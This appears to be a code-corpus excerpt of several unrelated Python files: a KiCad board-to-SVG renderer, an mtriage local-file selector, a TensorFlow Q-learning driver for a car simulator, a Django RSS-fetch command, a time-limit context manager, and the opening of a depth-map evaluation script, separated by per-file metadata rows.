            if svg_file.endswith("-" + f + ".svg"):
                process(container, f, os.path.join(tmp, svg_file), colors)
    shutil.rmtree(tmp)
    if holes:
        container.append(get_hole_mask(board))
        container.attrib["mask"] = "url(#hole-mask)"
    return container
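# KiCad names each plotted file "<board name>-<sheet suffix>.svg", and
# OpenPlotfile() above passes the layer tag as that suffix; this is why the
# second loop recovers each temporary SVG by matching the "-<name>.svg" ending.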
def walk_components(board, export):
    module = board.GetModules()
    while True:
        if not module:
            return
        # Top is for Eagle boards imported to KiCAD
        if str(module.GetLayerName()) not in ["Top", "F.Cu"]:
            module = module.Next()
            continue
        lib = str(module.GetFPID().GetLibNickname()).strip()
        try:
            name = str(module.GetFPID().GetFootprintName()).strip()
        except AttributeError:
            # it seems we are working on KiCad >4.0.6, which has a changed method name
            name = str(module.GetFPID().GetLibItemName()).strip()
        value = unicode(module.GetValue()).strip()
        ref = unicode(module.GetReference()).strip()
        center = module.GetCenter()
        orient = math.radians(module.GetOrientation() / 10)
        pos = (center.x, center.y, orient)
        export(lib, name, value, ref, pos)
        module = module.Next()
def get_hole_mask(board):
    defs = etree.Element("defs")
    mask = etree.SubElement(defs, "mask", id="hole-mask")
    container = etree.SubElement(mask, "g")

    bb = board.ComputeBoundingBox()
    bg = etree.SubElement(container, "rect", x="0", y="0", fill="white")
    bg.attrib["x"] = str(ki2dmil(bb.GetX()))
    bg.attrib["y"] = str(ki2dmil(bb.GetY()))
    bg.attrib["width"] = str(ki2dmil(bb.GetWidth()))
    bg.attrib["height"] = str(ki2dmil(bb.GetHeight()))

    module = board.GetModules()
    while module:
        if module.GetPadCount() == 0:
            module = module.Next()
            continue
        pad = module.Pads()
        try:
            pad.GetPosition()
        except AttributeError:
            # Newest nightly renames Pads to PadList
            pad = module.PadsList()
        orient = module.GetOrientation()
        while pad:
            pos = pad.GetPosition()
            pos.x = ki2dmil(pos.x)
            pos.y = ki2dmil(pos.y)
            size = map(ki2dmil, pad.GetDrillSize())
            if size[0] > 0 and size[1] > 0:
                if size[0] < size[1]:
                    stroke = size[0]
                    length = size[1] - size[0]
                    points = "{} {} {} {}".format(0, -length / 2, 0, length / 2)
                else:
                    stroke = size[1]
                    length = size[0] - size[1]
                    points = "{} {} {} {}".format(-length / 2, 0, length / 2, 0)
                el = etree.SubElement(container, "polyline")
                el.attrib["stroke-linecap"] = "round"
                el.attrib["stroke"] = "black"
                el.attrib["stroke-width"] = str(stroke)
                el.attrib["points"] = points
                el.attrib["transform"] = "translate({} {}) rotate({})".format(
                    pos.x, pos.y, -orient)
            pad = pad.Next()
        module = module.Next()
    return defs
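# Each drill is rendered as a stroked polyline with round caps: a zero-length
# line gives a round hole, while a line as long as the difference between the
# two drill dimensions gives an oval (slotted) hole, so one primitive covers
# both cases.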
def get_model_file(paths, lib, name, ref, remapping):
    """ Find model file in library considering component remapping """
    for path in paths:
        if ref in remapping:
            lib, name = tuple(remapping[ref].split(":"))
        f = os.path.join(path, lib, name + ".svg")
        if os.path.isfile(f):
            return f
    return None

def print_component(paths, lib, name, value, ref, pos, remapping={}):
    f = get_model_file(paths, lib, name, ref, remapping)
    msg = "{} with package {}:{} at [{},{},{}] -> {}".format(
        ref, lib, name, pos[0], pos[1], math.degrees(pos[2]), f if f else "Not found")
    print(msg)
def component_from_library(parent, paths, lib, name, value, ref, pos, placeholder=True, remapping={}):
    if not name:
        return
    f = get_model_file(paths, lib, name, ref, remapping)
    if not f:
        print("Warning: component '{}' from library '{}' was not found".format(name, lib))
        if placeholder:
            etree.SubElement(parent, "rect", x=str(ki2dmil(pos[0])), y=str(ki2dmil(pos[1])),
                             width="300", height="300", style="fill:red;")
        return
    parent.append(etree.Comment("{}:{}".format(lib, name)))
    r = etree.SubElement(parent, "g")
    for x in extract_svg_content(f):
        r.append(x)
    origin_x = 0
    origin_y = 0
    origin = r.find(".//*[@id='origin']")
    if origin is not None:
        origin_x = float(origin.attrib["x"])
        origin_y = float(origin.attrib["y"])
        origin.getparent().remove(origin)
    else:
        print("Warning: component '{}' from library '{}' has no ORIGIN".format(name, lib))
    r.attrib["transform"] = "translate({} {}) scale(393.700787402) rotate({}) translate({}, {})".format(
        ki2dmil(pos[0]), ki2dmil(pos[1]),
        -math.degrees(pos[2]), -origin_x, -origin_y)
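# The factor 393.700787402 is dmil-per-mm (1 mm = 0.0393700787 in =
# 393.700787 dmil), mapping footprint artwork -- presumably authored in
# millimetre units -- into the board's decimil space; the surrounding
# translate/rotate calls then align the footprint's "origin" marker with the
# component centre reported by KiCad.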
def load_style(style_file):
    try:
        with open(style_file, "r") as f:
            style = json.load(f)
    except IOError:
        raise RuntimeError("Cannot open style " + style_file)
    required = set(["copper", "board", "silk", "pads", "outline"])
    missing = required - set(style.keys())
    if missing:
        raise RuntimeError("Missing following keys in style {}: {}"
                           .format(style_file, ", ".join(missing)))
    extra = set(style.keys()) - required
    for x in extra:
        print("Warning: extra key '" + x + "' in style")
    # ToDo: Check validity of colors (SVG compatible format)
    return style

def load_remapping(remap_file):
    if not remap_file:
        return {}
    try:
        with open(remap_file, "r") as f:
            return json.load(f)
    except IOError:
        raise RuntimeError("Cannot open remapping file " + remap_file)
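# Illustrative (hypothetical) inputs for the two loaders above:
#   style JSON -- {"copper": "#417e5a", "board": "#4ca06c", "silk": "#f0f0f0",
#                  "pads": "#b5ae30", "outline": "#000000"}
#   remap JSON -- {"R1": "mylib:resistor_0805"}, mapping reference R1 to model
#                 "resistor_0805" inside library directory "mylib".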
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--style", help="JSON file with board style")
    parser.add_argument("libraries", help="directories containing SVG footprints")
    parser.add_argument("output", help="destination for final SVG")
    parser.add_argument("board", help=".kicad_pcb file to draw")
    parser.add_argument("-p", "--placeholder", action="store_true",
                        help="show placeholder for missing components")
    parser.add_argument("-m", "--remap",
                        help="JSON file mapping a part reference to <lib>:<model> to remap packages")
    parser.add_argument("-l", "--list-components", action="store_true",
                        help="dry run, just list the components")
    parser.add_argument("--no-drillholes", action="store_true", help="do not make holes transparent")

    args = parser.parse_args()
    args.libraries = args.libraries.split(',')
    print(args)

    try:
        if args.style:
            style = load_style(args.style)
        else:
            style = default_style
        remapping = load_remapping(args.remap)
    except RuntimeError as e:
        print(e.message)
        sys.exit(1)

    try:
        print("Please ignore following debug output of KiCAD Python API")
        board = pcbnew.LoadBoard(args.board)
        print("End of KiCAD debug output")
    except IOError:
        print("Cannot open board " + args.board)
        sys.exit(1)

    if args.list_components:
        walk_components(board, lambda lib, name, val, ref, pos:
                        print_component(args.libraries, lib, name, val, ref, pos,
                                        remapping=remapping))
        sys.exit(0)

    bb = board.ComputeBoundingBox()
    document = empty_svg(
        width="{}cm".format(bb.GetWidth() / 10000000.0),
        height="{}cm".format(bb.GetHeight() / 10000000.0),
        viewBox="0 0 {} {}".format(ki2dmil(bb.GetWidth()), ki2dmil(bb.GetHeight())))
    wrapper = etree.SubElement(document.getroot(), "g",
                               transform="translate({}, {})".format(ki2dmil(-bb.GetX()), ki2dmil(-bb.GetY())))
    wrapper.append(get_board_substrate(board, style, not args.no_drillholes))
    walk_components(board, lambda lib, name, val, ref, pos:
                    component_from_library(wrapper, args.libraries, lib, name, val, ref, pos,
                                           placeholder=args.placeholder, remapping=remapping))
    document.write(args.output)
| 38.217687 | 104 | 0.572742 | 2,091 | 16,854 | 4.540411 | 0.20373 | 0.01264 | 0.019907 | 0.013693 | 0.179376 | 0.162418 | 0.119865 | 0.103012 | 0.081736 | 0.040025 | 0 | 0.020304 | 0.28112 | 16,854 | 440 | 105 | 38.304545 | 0.763288 | 0.051086 | 0 | 0.169312 | 0 | 0.002646 | 0.112637 | 0 | 0.002646 | 0 | 0 | 0.002273 | 0 | 1 | 0.055556 | false | 0.002646 | 0.026455 | 0.002646 | 0.12963 | 0.034392 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f679b14fc387f30bc2bc6b965bd6ffea44f1f036 | 2,189 | py | Python | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | import os
from pathlib import Path
from shutil import copyfile

from lib.common.selector import Selector
from lib.common.etypes import Etype, Index
from lib.common.exceptions import SelectorIndexError

BASE = Path("/mtriage")


class Local(Selector):
    """A simple selector for importing local files into mtriage.

    It recursively finds every file in a source_folder specified in the config
    (see example script 4.select_local.sh) and imports each file into its own
    element. The element ID is the file's name concatenated with its extension.

    n.b. the directory being imported must be located within the mtriage
    directory on the mtriage host to be accessible inside the docker container
    (the media folder is recommended).
    """

    out_etype = Etype.Any

    def __init__(self, *args):
        super().__init__(*args)

    def is_aggregate(self):
        return "aggregate" in self.config and self.config["aggregate"]

    def index(self, config):
        src = Path(config["source"])
        abs_src = BASE / src
        if not os.path.exists(abs_src):
            raise SelectorIndexError(
                f"The 'source' folder {src} could not be found. Ensure it is in the same directory as mtriage."
            )
        return self._index(abs_src)
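    # A hypothetical config illustrating the fields this selector reads:
    # {"source": "media/demo", "aggregate": false, "exclude": [".DS_Store"]}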
    def _index(self, abs_src):
        self.logger("Indexing local folder...")
        results = [["id", "path"]]
        excluded = self.config.get("exclude", [])
        for root, _, files in os.walk(abs_src):
            main = Path(abs_src)
            root = Path(root)
            for file in files:
                if file == ".mtbatch" or file in excluded:
                    continue
                fp = root / file
                elid = root.name if (root.name != main.name) else fp.stem
                results.append([elid, fp])
                self.logger(f"indexed file {fp} as: {elid}")
        if self.is_aggregate():
            # `self.results` is used in `retrieve_element` for paths.
            self.results = results[1:]
            # NB: hacky way to make `retrieve_element` run just once.
            return Index([["id"], ["IS_AGGREGATE"]])
        return Index(results)

    def retrieve_element(self, element, config):
        if self.is_aggregate():
            og_folder = Path(config["source"])
            return Etype.Any(og_folder.name, paths=[x[1] for x in self.results])
        else:
            return Etype.Any(element.id, paths=[element.path])


module = Local
| 31.271429 | 101 | 0.703518 | 326 | 2,189 | 4.634969 | 0.389571 | 0.023825 | 0.025811 | 0.022502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001683 | 0.185473 | 2,189 | 69 | 102 | 31.724638 | 0.845766 | 0.264504 | 0 | 0.043478 | 0 | 0.021739 | 0.13723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.130435 | 0.021739 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67b5cd19685b6f6168adfcb635e7a19ce5a128b | 11,335 | py | Python | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | import logging
import sys
sys.path.insert(0, '../')
import config
from tensorflow.python.tools import inspect_checkpoint as chkp
import tensorflow as tf
import numpy as np
import random

logging.basicConfig(filename=config.logFile, level=config.logLevelPlayer, format='%(asctime)s %(message)s')


class Rn:
    # Future rewards discount
    Y = 0.95
    # Exploration/exploitation ratio (learning ratio)
    ALPHA = 0.01
    MIN_ALPHA = 0.1
    MAX_ALPHA = 0.85
    LAMBDA = 0.0001
    NB_EPISODE = 3000
    # how far into the future rewards are considered when computing qsa
    # 1 means all future states are important (may be divergent)
    # 0 means only the current reward is taken into account
    # 0.9363 means the 70th step after has less than 1% influence
    # 0.99 means the 460th step after has less than 1% influence
    GAMMA = 0.9363
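    # Sanity check for the figures above: 0.9363 ** 70 ~= 0.0099 and
    # 0.99 ** 459 ~= 0.0099, both just under the 1% mark.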
    # 13 possible actions:
    # ---------------------
    # 0 = steer fully left
    # ...
    # 6 = straight ahead (default action)
    # ...
    # 12 = steer fully right
    DEFAULT_PREVIOUS_ACTION = [0, 1, 0]
    NB_ACTIONS = len(DEFAULT_PREVIOUS_ACTION)
    DEFAULT_INPUTS = [0, 0, 1, 0, 1, 0]
    NB_INPUTS = len(DEFAULT_INPUTS)
    NB_NEURON_BY_LAYER = NB_INPUTS * 4
    def __init__(self, performTraining):
        self.isTrainingOn = performTraining
        self.alpha = 1
        self.num_step = 0
        self.V = 0
        self.previousAction = self.DEFAULT_PREVIOUS_ACTION
        tf.reset_default_graph()
        self.sess = None
        self.optimizer = None
        self.inputs = None
        self.hidden1 = None
        self.hidden2 = None
        self.hidden3 = None
        self.actions = None
        self.rewards = None
        self.saver = None
        self._q_s_a = None
        self.num_episode = 0
        self.num_step_max = 0
        self.previousStartIndex = 0
        self._start()
    # cf https://github.com/adventuresinML/adventures-in-ml-code/blob/master/r_learning_tensorflow.py
    def _build_network(self):
        self.inputs = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_INPUTS))
        self._q_s_a = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_ACTIONS))
        # outputs: one per possible action (the same actions are always
        # available regardless of the state)
        #self.actions = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_ACTIONS))
        # reward
        #rewards = tf.placeholder(dtype=tf.float32, shape=(None, 1))
        #with tf.variable_scope('policy'):
        # hidden layers (as many neurons as NB_NEURON_BY_LAYER), fully connected => dense
        self.hidden1 = tf.layers.dense(self.inputs, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer())
        self.hidden2 = tf.layers.dense(self.hidden1, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer())
        # self.hidden3 = tf.layers.dense(self.hidden2, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer())
        # output layer, one unit per possible action, no activation function;
        # we would like the outputs to match the expected rewards
        self.actions = tf.layers.dense(self.hidden2, self.NB_ACTIONS, activation=None, kernel_initializer=tf.contrib.layers.xavier_initializer())
        # post-processing of the output to keep a single 1 and 0s elsewhere
        #threshold_to_max = tf.less_equal(tf.reduce_max(self.actions), self.actions)
        # cast booleans to float32 (True => 1, False => 0)
        #self.out = tf.cast(threshold_to_max, tf.float32)
        # original approach:
        loss = tf.losses.mean_squared_error(self._q_s_a, self.actions)
        self._optimizer = tf.train.AdamOptimizer().minimize(loss)
        # alternative approach:
        #cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=actions, logits=self.actions, name="cross_entropy")
        #loss = tf.reduce_sum(tf.multiply(rewards, cross_entropy, name="rewards"))
        #decay_rate = 0.99
        #self.optimizer = tf.train.RMSPropOptimizer(self.ALPHA, decay=decay_rate).minimize(loss)

        # tf.summary.histogram("input_data", self.inputs)
        # tf.summary.histogram("hidden_1", self.hidden1)
        # tf.summary.histogram("hidden_2", self.hidden2)
        # tf.summary.histogram("hidden_3", self.hidden3)
        # tf.summary.histogram("sortie", self.actions)
        # tf.summary.histogram("action", self.out)
        merged = tf.summary.merge_all()
        self.saver = tf.train.Saver()
        # grads = tf.gradients(loss, [hidden_w, logit_w])
        # return pixels, actions, rewards, out, optimizer, merged, grads
        return merged
    def _start(self):
        if self.sess != None:
            self.sess.close()
        tf.reset_default_graph()
        merged_sym = self._build_network()
        # Init new session with default graph
        self.sess = tf.Session()
        # writer = tf.summary.FileWriter('./log/train', self.sess.graph)
        try:
            weights = open(config.rnCheckpointsFile + '.index', 'r')
            weights.close()
            logging.debug("RN initialized from file: " + config.rnCheckpointsFile)
            self.saver.restore(self.sess, tf.train.latest_checkpoint(config.rnCheckpointsDir))
        except FileNotFoundError:
            logging.debug("RN initialized randomly...")
            self.sess.run(tf.global_variables_initializer())
    def startNewGame(self, startIndex):
        self.num_episode += 1
        if self.num_step > self.num_step_max:
            self.num_step_max = self.num_step
        self.num_step = startIndex
        # re-evaluate num_step_max every time startIndex changes
        if self.previousStartIndex != startIndex:
            self.previousStartIndex = startIndex
            self.num_step_max = 40

    # save model
    def save(self):
        self.saver.save(self.sess, config.rnCheckpointsFile + "_" + str(self.num_episode) + ".ckpt")

    # method used to process a new state provided by the environment
    def compute(self, inputs):
        # inputs are already well formatted
        ##### RN processing #####
        # Get the Rn output for the given input.
        # In fact, as we are exploring, we either get the Rn output or a random output...
        result, isRandomChoice = self._choose_action(inputs)
        return result, isRandomChoice
    # Replay a batch to train the nn.
    # each item of batch is composed of:
    # - the inputs (angle, distance, height, the previous previous action (as flat array of all possible actions))
    # - the previous action
    # - the reward
    # - the next state as (new angle, new distance, new height, the action (as flat array of all possible actions) that led to this state (previous action))
    def replay(self, batch):
        states = np.array([val[0] for val in batch])
        notDeterminedNextState = np.zeros(self.NB_INPUTS)
        next_states = np.asarray([(notDeterminedNextState if val[3] is None else val[3]) for val in batch])
        # predict Q(s,a) given the batch of states
        q_s_a = self._predict_batch(states)
        # predict Q(s',a') - so that we can do gamma * max(Q(s'a')) below
        q_s_a_d = self._predict_batch(next_states)
        # setup training arrays
        x = np.zeros((len(batch), self.NB_INPUTS))
        y = np.zeros((len(batch), self.NB_ACTIONS))
        for i, b in enumerate(batch):
            state, action, reward, next_state = b[0], b[1], b[2], b[3]
            # get the current q values for all actions in state
            current_q = q_s_a[i]
            # update the q value for action
            if next_state is None:
                # in this case, the game completed after action, so there is no max Q(s',a')
                # prediction possible
                current_q[np.argmax(action)] = reward
            else:
                current_q[np.argmax(action)] = reward + self.GAMMA * np.amax(q_s_a_d[i])
            x[i] = state
            y[i] = current_q
        self._train_batch(x, y)
        #logging.info("AFTER TRAIN BATCH...")
        self._log_weights()
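    # Worked example of the target above (illustrative numbers): with
    # reward = 1.0, GAMMA = 0.9363 and max Q(s',.) = 0.5, the target for the
    # action actually taken becomes 1.0 + 0.9363 * 0.5 = 1.46815; the targets
    # for all other actions stay at the network's own current predictions.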
    # As we are exploring, either get the Rn output or a random output by comparing
    # a random value to a predetermined value alpha...
    # At the beginning, as there is no knowledge of the environment, we explore a lot and set alpha to 1.
    # At each step we reduce the probability of choosing a random output by reducing the alpha value.
    def _choose_action(self, inputs):
        # exponentially decay the alpha value at each choice
        self.num_step += 1
        #alpha = self.MIN_ALPHA + (self.MAX_ALPHA - self.MIN_ALPHA) * max(0, (1-self.num_episode/self.NB_EPISODE))
        #alpha = 0.1
        #alpha = 0.1 + (0.9) * max(0, (1-self.num_episode/80))
        if self.num_step < self.num_step_max - 20:
            alpha = 0.02
        #elif self.num_step < self.num_step_max:
        #    alpha = 0.02 + (0.6) * (self.num_step - (self.num_step_max-80))/80
        else:
            alpha = 0.1
        logging.debug("alpha=" + str(alpha))
        if self.isTrainingOn and random.random() < alpha:
            logging.debug("step=" + str(self.num_step) + " RANDOM ACTION")
            actions = [0] * self.NB_ACTIONS
            chosen_index = random.randint(0, self.NB_ACTIONS - 1)
            actions[chosen_index] = 1
            return np.array(actions), True
        else:
            logging.debug("step=" + str(self.num_step) + " COMPUTED ACTION")
            return self._predict_one(inputs), False
    def _predict_one(self, inputs):
        logging.debug("PREDICT ONE !!!")
        result = self.sess.run(self.actions, feed_dict={self.inputs: inputs.reshape(1, self.NB_INPUTS)})
        self._log_weights()
        #var = [v for v in tf.trainable_variables() if v.name == "hidden1/weights:0"][0]
        #logging.info("hidden1 : %s" % self.sess.run(self.hidden1.eval())
        #logging.info("hidden2 : %s" % self.hidden2.eval())
        #logging.info("hidden3 : %s" % self.hidden3.eval())
        # logging.info("output : %s" % self.actions.eval())
        return result[0]

    def _predict_batch(self, inputs):
        #logging.info("PREDICT BATCH !!!")
        self._log_weights()
        return self.sess.run(self.actions, feed_dict={self.inputs: np.array(inputs)})

    def _train_batch(self, x_batch, y_batch):
        #logging.info("TRAIN BATCH !!!")
        self._log_weights()
        return self.sess.run(self._optimizer, feed_dict={self.inputs: x_batch, self._q_s_a: y_batch})

    def _log_weights(self):
        if False:
            for v in tf.trainable_variables():
                logging.info(v.name + ":")
                logging.info(self.sess.run(v))
| 42.935606 | 163 | 0.610763 | 1,472 | 11,335 | 4.569293 | 0.253397 | 0.022896 | 0.027803 | 0.01457 | 0.209783 | 0.19774 | 0.168153 | 0.127416 | 0.097978 | 0.070175 | 0 | 0.019077 | 0.283194 | 11,335 | 264 | 164 | 42.935606 | 0.808738 | 0.387825 | 0 | 0.068182 | 0 | 0 | 0.02369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.05303 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67cb57866ffbaf57adcdd2f642ca09d35ff5b0c | 521 | py | Python | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 8 | 2015-01-05T07:04:02.000Z | 2016-07-19T17:56:46.000Z | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 32 | 2015-03-18T18:51:00.000Z | 2021-06-10T20:37:33.000Z | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 5 | 2015-02-10T21:15:32.000Z | 2016-06-02T17:26:14.000Z | from django.core.management.base import BaseCommand

from ...apps.podcasts.models import Podcast


class Command(BaseCommand):

    help = "Fetch all podcast RSS feeds"

    def handle(self, *args, **options):
        verbose = (options['verbosity'] > 0)
        if verbose:
            self.stdout.write('Fetching all RSS feeds.\n\n')
        for podcast in Podcast.objects.all():
            self.stdout.write(u'- {}\n {}\n\n'.format(
                podcast.title, podcast.rss_url))
            podcast.fetches.create().start()
| 30.647059 | 60 | 0.614203 | 63 | 521 | 5.063492 | 0.68254 | 0.018809 | 0.094044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002551 | 0.247601 | 521 | 16 | 61 | 32.5625 | 0.811224 | 0 | 0 | 0 | 0 | 0 | 0.128599 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67d51e4d04cf2aabb8deef1712b57f7257ceacc | 1,003 | py | Python | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | #!python3

"""
A context for running functions with a time-limit.
Throws an exception if the function does not finish within the limit.

USAGE:

with time_limit(10):
    foo()

NOTE: This does not work on Windows. See:
https://stackoverflow.com/a/8420498/827927
"""

import signal
import contextlib


class TimeoutException(Exception): pass


IS_TIME_LIMIT_SUPPORTED = hasattr(signal, "SIGALRM")  # only works on Linux
if not IS_TIME_LIMIT_SUPPORTED:
    import warnings
    warnings.warn("Time-limit is not supported by your operating system.")


@contextlib.contextmanager
def time_limit(seconds):
    if IS_TIME_LIMIT_SUPPORTED:
        def signal_handler(signum, frame):
            raise TimeoutException("Timed out!")
        signal.signal(signal.SIGALRM, signal_handler)
        signal.alarm(seconds)
        try:
            yield
        finally:
            signal.alarm(0)
    else:
        yield
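# Note: signal.alarm(0) in the finally block cancels any pending alarm, so the
# handler cannot fire after the block exits. Since a process has only one
# SIGALRM timer, these contexts are not reentrant: nesting two time_limit
# blocks would silently clobber the outer alarm.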
if __name__ == "__main__":
    with time_limit(1):
        for i in range(1000): print(i)
| 22.795455 | 75 | 0.684945 | 131 | 1,003 | 5.076336 | 0.572519 | 0.108271 | 0.049624 | 0.090226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028424 | 0.228315 | 1,003 | 43 | 76 | 23.325581 | 0.830749 | 0.274177 | 0 | 0.086957 | 0 | 0 | 0.108484 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.043478 | 0.130435 | 0 | 0.26087 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67fc9d4d95893aeeecd1c5378c7a47c828c7677 | 5,476 | py | Python | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | import os
import re
import sys
from posix import listdir
from shutil import copyfile
from pathlib import Path
import numpy as np
from PIL import Image
from skimage.transform import resize
import utils.image_io

TAG_FLOAT = 202021.25
TAG_CHAR = 'PIEH'

name = "shaman_3"
if len(sys.argv) > 1:
    name = str(sys.argv[1])
batch_size = 1  # TODO
#file_path="/home/umbra/Documents/MPI-Sintel-depth-training-20150305/training/depth/bamboo_2/frame_0001.dpt"
src_path = "./data/FN/" + name + "/clean/"
depth_path = os.path.join(src_path, "R_hierarchical2_mc/B0.1_R1.0_PL1-0_LR0.0004_BS" + str(batch_size) + "_Oadam/exact_depth/")
initial_path = os.path.join(src_path, "depth_mc/exact_depth/")
truth_path = "../MPI-Sintel-depth-training-20150305/training/depth/" + name + "/"
def depth_read(filename):  # Copied from sintel_io.py from http://sintel.is.tue.mpg.de/depth
    """ Read depth data from file, return as numpy array. """
    f = open(filename, 'rb')
    check = np.fromfile(f, dtype=np.float32, count=1)[0]
    assert check == TAG_FLOAT, ' depth_read:: Wrong tag in flow file (should be: {0}, is: {1}). Big-endian machine? '.format(TAG_FLOAT, check)
    width = np.fromfile(f, dtype=np.int32, count=1)[0]
    height = np.fromfile(f, dtype=np.int32, count=1)[0]
    size = width * height
    assert width > 0 and height > 0 and size > 1 and size < 100000000, ' depth_read:: Wrong input size (width = {0}, height = {1}).'.format(width, height)
    depth = np.fromfile(f, dtype=np.float32, count=-1).reshape((height, width))
    return depth
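# The sanity tag 202021.25 follows the Middlebury/Sintel convention: it is the
# ASCII string 'PIEH' (TAG_CHAR above) reinterpreted as a little-endian
# float32, chosen so that any endianness or text-mode mix-up corrupts it.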
#depth = depth_read(depth_path)
#print((depth).shape)
#truth = depth_read(truth_path)
#print((truth).shape)
#shape=tuple((depth).shape)
#shape=(436, 1024)
#depth = resize(depth, truth.shape)
#print((depth).shape)
#print(np.nanmin(depth))
#print(np.nanmean(depth))
#print(np.nanmax(depth))
#print(np.nanmin(truth))
#print(np.nanmean(truth))
#print(np.nanmax(truth))
#distance = (truth - depth)
#distance.flatten()

depth_truth_dir = os.path.join(depth_path, "depth_truth")
depth_truth_fmt = os.path.join(depth_truth_dir, "frame_{:06d}")
depth_error_dir = os.path.join(depth_path, "depth_error")
depth_error_fmt = os.path.join(depth_error_dir, "frame_{:06d}")

# Calculate statistical scale factor:
scale_factor = []
scale_factor_initial = []
files = os.listdir(truth_path)
files.sort()
for file in files:  # ["frame_0001.dpt"]:
    truth = depth_read(os.path.join(truth_path, file))
    depth = depth_read(os.path.join(depth_path, file))
    #depth = resize(depth, truth.shape)
    depth_initial = depth_read(os.path.join(initial_path, file))
    #depth_initial = resize(depth_initial, truth.shape)
    truth[truth == 100000000000.0] = np.nan
    truth = resize(truth, depth.shape)
    scale_factor.append(np.nanmean(truth) / np.nanmean(depth))
    scale_factor_initial.append(np.nanmean(truth) / np.nanmean(depth_initial))
    print("ScaleFactor for " + file + ": " + str(np.nanmean(truth) / np.nanmean(depth)))
scale_factor = np.nanmean(scale_factor)
scale_factor_initial = np.nanmean(scale_factor_initial)
# Compute distance:
ml1 = []
mse = []
ml1_norm = []
mse_norm = []
ml1_initial = []
mse_initial = []
ml1_norm_initial = []
